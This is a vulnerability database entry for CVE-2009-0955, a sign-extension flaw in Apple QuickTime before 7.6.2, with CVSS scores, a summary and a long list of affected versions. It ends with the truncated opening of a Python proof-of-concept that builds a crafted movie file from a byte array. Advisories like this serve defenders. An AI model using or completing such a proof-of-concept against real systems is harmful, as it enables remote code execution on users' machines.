9.3
CVSSv2

CVE-2009-0955

Published: 02/06/2009 Updated: 30/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Apple QuickTime prior to 7.6.2 allows remote malicious users to execute arbitrary code or cause a denial of service (application crash) via crafted image description atoms in an Apple video file, related to a "sign extension issue."

Vulnerable Product Search on Vulmon Subscribe to Product

apple quicktime 4.1.2

apple quicktime 5.0.1

apple quicktime 6.0.1

apple quicktime 5.0.2

apple quicktime 6.0.2

apple quicktime 6.1.0

apple quicktime 6.4.0

apple quicktime 6.2.0

apple quicktime 6.5.1

apple quicktime 6.5.2

apple quicktime 7.0

apple quicktime 7.0.0

apple quicktime 7.0.2

apple quicktime 7.0.3

apple quicktime -

apple quicktime 7.1

apple quicktime 7.1.3

apple quicktime 7.1.2

apple quicktime 7.1.4

apple quicktime 7.1.5

apple quicktime 7.2.1

apple quicktime 7.2

apple quicktime 3.0

apple quicktime 5.0

apple quicktime 6.0

apple quicktime 6.1

apple quicktime 6.3.0

apple quicktime 6.5.0

apple quicktime 6.0.0

apple quicktime 6.5

apple quicktime 7.0.1

apple quicktime 7.0.4

apple quicktime 7.1.1

apple quicktime 7.1.0

apple quicktime 7.2.0

apple quicktime 7.1.6

apple quicktime 7.3

apple quicktime 7.3.0

apple quicktime 7.3.1

apple quicktime 7.4.0

apple quicktime 7.5.0

apple quicktime 7.6.0

apple quicktime 7.3.1.70

apple quicktime 7.4.1

apple quicktime 7.4.5

apple quicktime

apple quicktime 6.1.1

apple quicktime 7.5.5

apple quicktime 7.4.4

apple quicktime 7.4

Exploits

print " -----------BID 35166----------" print " w3bd3vil [at] gmail [dot] com" print "Apple QuickTime Image Description Atom Sign Extension Vulnerability PoC" print " -----------BID 35166----------" bytes = [ 0x00, 0x00, 0x00, 0x08, 0x77, 0x69, 0x64, 0x65, 0x00, 0x02, 0xD6, 0x48, 0x6D, 0x64, 0x61, 0x74, 0xE1, 0x00, 0x14, 0x58, 0xA0, 0x00, 0x0 ...